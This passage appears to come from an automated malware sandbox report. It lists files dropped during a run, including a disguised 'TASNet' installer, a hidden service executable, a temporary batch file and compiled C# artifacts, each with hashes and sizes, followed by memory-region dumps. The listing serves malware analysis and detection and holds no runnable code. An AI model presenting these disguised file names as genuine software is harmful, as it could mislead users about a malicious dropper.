              1KB

              MD5

              ca437327b85e14a83ea0c5cfe60d20a7

              SHA1

              6bcb53030874c712d6bbf539dd8bd02445020c5a

              SHA256

              98a73bd3fbe54cee30c37ec622dbced0a762974a31c635a627d573d14a9a24b4

              SHA512

              d752aca68b8bc28d15491ccd433fd06b01384ef147fee221568f3be4ed08e083ecdf6bea74ace90f57a980dceffd7ec149a4e5d3e966f32c40aa5959624085c7

            • C:\Users\Admin\AppData\Local\Temp\RES5BD6.tmp

              Filesize

              1KB

              MD5

              c60e743face02362b9595bd06aa7ce6c

              SHA1

              3bf96fe4a313d554d6bf0e34fc1158a2671ebcde

              SHA256

              fad4b93263aeb6f9e3a915d5d2c89bbe3e3ba175e13b490928d27abb6923ab34

              SHA512

              3ba10ab260c4e875ef2f19a44b00b162c972f0eb1d37266152be47b7f9aa0cbae5e81d4e722261062438cb46885a8909bcf04aedb8eac75a21eee99b9832689d

            • C:\Users\Admin\AppData\Local\Temp\TASNet-6.4.2-win64.exe

              Filesize

              11.1MB

              MD5

              21bd4314ff1dc491b8caac21c5e92d32

              SHA1

              1e47badd5445a66906a5f968e6165611cf3348ca

              SHA256

              907e248770a737cb7692d8d12205e7267ad1e77d241f61bf3762fad1177996e3

              SHA512

              2a31f87d35b66c9d65804010bde61ca145b7d4ff6806bd4ac0ba591a1c7ed1ede134e147d088d800ac1e60756656c3f2774292ae9b00df3f9e989768622180e4

            • C:\Users\Admin\AppData\Local\Temp\TarDA6D.tmp

              Filesize

              181KB

              MD5

              4ea6026cf93ec6338144661bf1202cd1

              SHA1

              a1dec9044f750ad887935a01430bf49322fbdcb7

              SHA256

              8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

              SHA512

              6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

            • C:\Users\Admin\AppData\Local\Temp\tmpDD45.tmp.bat

              Filesize

              164B

              MD5

              c7ffee750b231d8e88319596c6e49d63

              SHA1

              16666389d63ba93d0ae81bd8c438be44da2cca41

              SHA256

              2ff0e19e73cb51d14a9101a284460b972809aeee94dd30ba48e038c8db9528a7

              SHA512

              4650c9742fd9e3bc9297c0ef377348160880efbb065a673555f9ab0fa58d1ab65a8371291aa1a32e4a0b66b27d143b1d2b43c56089e491ffe32ac114a7f2cb07

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

              Filesize

              7KB

              MD5

              4bda049d58415503f5d8f443be7f951d

              SHA1

              f2dcfcff0a9e773061ba280b31869fe2b7c5e6b1

              SHA256

              101f36f8b83229708c2d9ee0843b2fdab682d69592a14a6211a7b03b85c166b3

              SHA512

              6934d5c9d67356ebf293f7a85aab1a18e1ab8165e8312520553b848bef255fd8695dcd9f942471f377a6cbc88e4d684de0b4e056fe7bac786f9969cfbefa14a7

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

              Filesize

              7KB

              MD5

              8de5ad3f0ed2f5c5347d1de85414558e

              SHA1

              5eff1b2765fc8b8c2e401b078612d03354563f30

              SHA256

              3d7eb5a61bfe1ae77f0218af374dd5956f38032428ddd99f075bd1ca600f3166

              SHA512

              127cb139ac86f8c151a226912cb5d08959ecfaf924842ececfb3b30045f24d111ca89ed9b9f7264373ee7d91cd1c588c984cd9b04b76bace6c76c24570228a13

            • C:\Users\Admin\AppData\Roaming\TasNET Service.exe

              Filesize

              81KB

              MD5

              3f8a4afb12f13712ee2f75400873c734

              SHA1

              af63280999063b26b74b3f7c4b2458e85bbdeaf5

              SHA256

              5d3b21cf3e15db8c42e8d57da53d00a32b6870fb3b92ac47577666c21abfdf6e

              SHA512

              0b66eec5c816b2af09ec12ae413922d9547833a2bb9bfdf9d2c032f2ead725f35032a80037429c5d5d3c7f2cc83b6ef5c61ef359aab00c1e2e446389d8bb6608

            • \??\PIPE\srvsvc

              MD5

              d41d8cd98f00b204e9800998ecf8427e

              SHA1

              da39a3ee5e6b4b0d3255bfef95601890afd80709

              SHA256

              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

              SHA512

              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

            • \??\c:\Users\Admin\AppData\Local\Temp\1tfhpkhi\1tfhpkhi.0.cs

              Filesize

              393B

              MD5

              dff5b10fb5def9f96526f2f8536e43ee

              SHA1

              9e7b53e11d5a20b6e5ab4bb1331a84f40af7be8d

              SHA256

              330376361577eada825e30d19b04e88b757a56acecdac296af019a55c732fea4

              SHA512

              9cc6b6c5792d256b53261d65fb3123867d8dda7fa020a3fd6ac764041a22c8d90989e1fcae50a7b291c8f28f3c58a666165c4d72ce45feaef4ff1b3cace613a4

            • \??\c:\Users\Admin\AppData\Local\Temp\1tfhpkhi\1tfhpkhi.cmdline

              Filesize

              247B

              MD5

              f703a109de36645677c137dffb364707

              SHA1

              8316b3a83c87c18ba4167d59c16babdb7ea3d5c6

              SHA256

              46044761836d03211fa48aa7cdc79d6358e57ed169e8661d98e403db1f89c57b

              SHA512

              18ae5f0cdeb727e727f09da0791ab55e0724620d612b5e57a247d568a795b0a4a759550be7367faabc6627323020ab3f993fb0bedaba69b9a810609512922c54

            • \??\c:\Users\Admin\AppData\Local\Temp\x0mzguz0\x0mzguz0.0.cs

              Filesize

              381B

              MD5

              c221dff58de3c59ad924a000ce5d0a5e

              SHA1

              4db3d76805e9dc45ff9b717c1c4c2f889bfaf6ea

              SHA256

              5d9bb9443c8c94f233e594877035c951f163668b74a02b568a573b2438a622af

              SHA512

              c91921ceac2e5d9dfd2d0cc035285de34e1067d5ddd15a102e805e0a55d2c23528e65cb37ba26e9b0277a02996af198a3cf7e9746f4d0f70c7f9a8df973410cd

            • \??\c:\Users\Admin\AppData\Local\Temp\x0mzguz0\x0mzguz0.cmdline

              Filesize

              235B

              MD5

              7f90979a47305ef405f9f74115f26cf1

              SHA1

              8e40b608b9f11b889c7d2d4955e3908a1bedd7b6

              SHA256

              39fb781a4fd7ac1598f40c111e56572c687d517bd61e5266caf783a67263efe7

              SHA512

              57885861ecdfc7acf5c9be883b58a90fd978924bbf40d253fb128eada0392b65d8dffb98269ca5585fef1c76eadadf5a40f62e7de9cdb867e5f5d6a8a6f67a40

            • \??\c:\Users\Admin\AppData\Roaming\CSC79DF5490896B4860845ED9159EF1E24.TMP

              Filesize

              1KB

              MD5

              b10290e193d94a5e3c95660f0626a397

              SHA1

              7b9de1fd7a43f6f506e5fc3426836b8c52d0d711

              SHA256

              75c9e1766bfb99754b6a00d37ef93488ab216b5ac48984ed7d9d2076a7056fd2

              SHA512

              6ae4201552a499eaa726416b29230f48d94ac7f40ff038165bf8582626bbefe601ef6c051ad97d9156dc4b9b55fd22081db61bcd013916136340c5f1324e4bb5

            • \??\c:\Windows\System32\CSC7ECC981844524103993796C0B2F1D7E.TMP

              Filesize

              1KB

              MD5

              b74f131aab310dc6e37b43e729c24199

              SHA1

              bade4cf35d7e80e79880396c1fdd518d9ab78bdf

              SHA256

              5fdff2a34cc18e36619ff327b292a8255286dc102d85074b7fc625ccbdbe1858

              SHA512

              733cb12c94d0a8bedc9a38c073dff2fc46553854d7e835767aaa749b4754beef77fa3bc8232eab21c92bc808c08b150cafe5c035bb33d82292fbf76fec55d885

            • \HypercomponentCommon\hyperSurrogateagentCrt.exe

              Filesize

              1.9MB

              MD5

              7be5cea1c84ad0b2a6d2e5b6292c8d80

              SHA1

              631e3de0fe83ebacbe5be4e7f895dd0bd8b095ce

              SHA256

              6eb90684ebc56fb2713f5c468b55a964625ec2af698d9687492b1de4225693b7

              SHA512

              ea58d3b1664fe70968635c2722e19ce65ce4c1d66c68aed2d98441e60e773c7295f18d9c99cf4c454c510f33f5e37d3d2c0053b7434a46c542a0d63a4cc03647

            • memory/488-35-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

              Filesize

              9.9MB

            • memory/488-221-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

              Filesize

              9.9MB

            • memory/488-9-0x0000000000F10000-0x0000000000F2A000-memory.dmp

              Filesize

              104KB

            • memory/488-222-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

              Filesize

              9.9MB

            • memory/488-224-0x0000000000B90000-0x0000000000B9C000-memory.dmp

              Filesize

              48KB

            • memory/488-10-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

              Filesize

              9.9MB

            • memory/932-204-0x0000000001E00000-0x0000000001E08000-memory.dmp

              Filesize

              32KB

            • memory/932-203-0x000000001B6A0000-0x000000001B982000-memory.dmp

              Filesize

              2.9MB

            • memory/1704-398-0x0000000001E00000-0x0000000001E08000-memory.dmp

              Filesize

              32KB

            • memory/1704-397-0x000000001B590000-0x000000001B872000-memory.dmp

              Filesize

              2.9MB

            • memory/1996-426-0x0000000001110000-0x00000000012F6000-memory.dmp

              Filesize

              1.9MB

            • memory/2380-0-0x000007FEF5BA3000-0x000007FEF5BA4000-memory.dmp

              Filesize

              4KB

            • memory/2380-2-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

              Filesize

              9.9MB

            • memory/2380-1-0x0000000001080000-0x0000000001B80000-memory.dmp

              Filesize

              11.0MB

            • memory/2380-24-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

              Filesize

              9.9MB

            • memory/2424-197-0x0000000001F70000-0x0000000001F78000-memory.dmp

              Filesize

              32KB

            • memory/2424-196-0x000000001B410000-0x000000001B6F2000-memory.dmp

              Filesize

              2.9MB

            • memory/2888-350-0x0000000000880000-0x000000000088C000-memory.dmp

              Filesize

              48KB

            • memory/2888-348-0x0000000000870000-0x000000000087E000-memory.dmp

              Filesize

              56KB

            • memory/2888-346-0x00000000008B0000-0x00000000008C8000-memory.dmp

              Filesize

              96KB

            • memory/2888-344-0x0000000000890000-0x00000000008AC000-memory.dmp

              Filesize

              112KB

            • memory/2888-342-0x0000000000850000-0x000000000085E000-memory.dmp

              Filesize

              56KB

            • memory/2888-340-0x00000000000D0000-0x00000000002B6000-memory.dmp

              Filesize

              1.9MB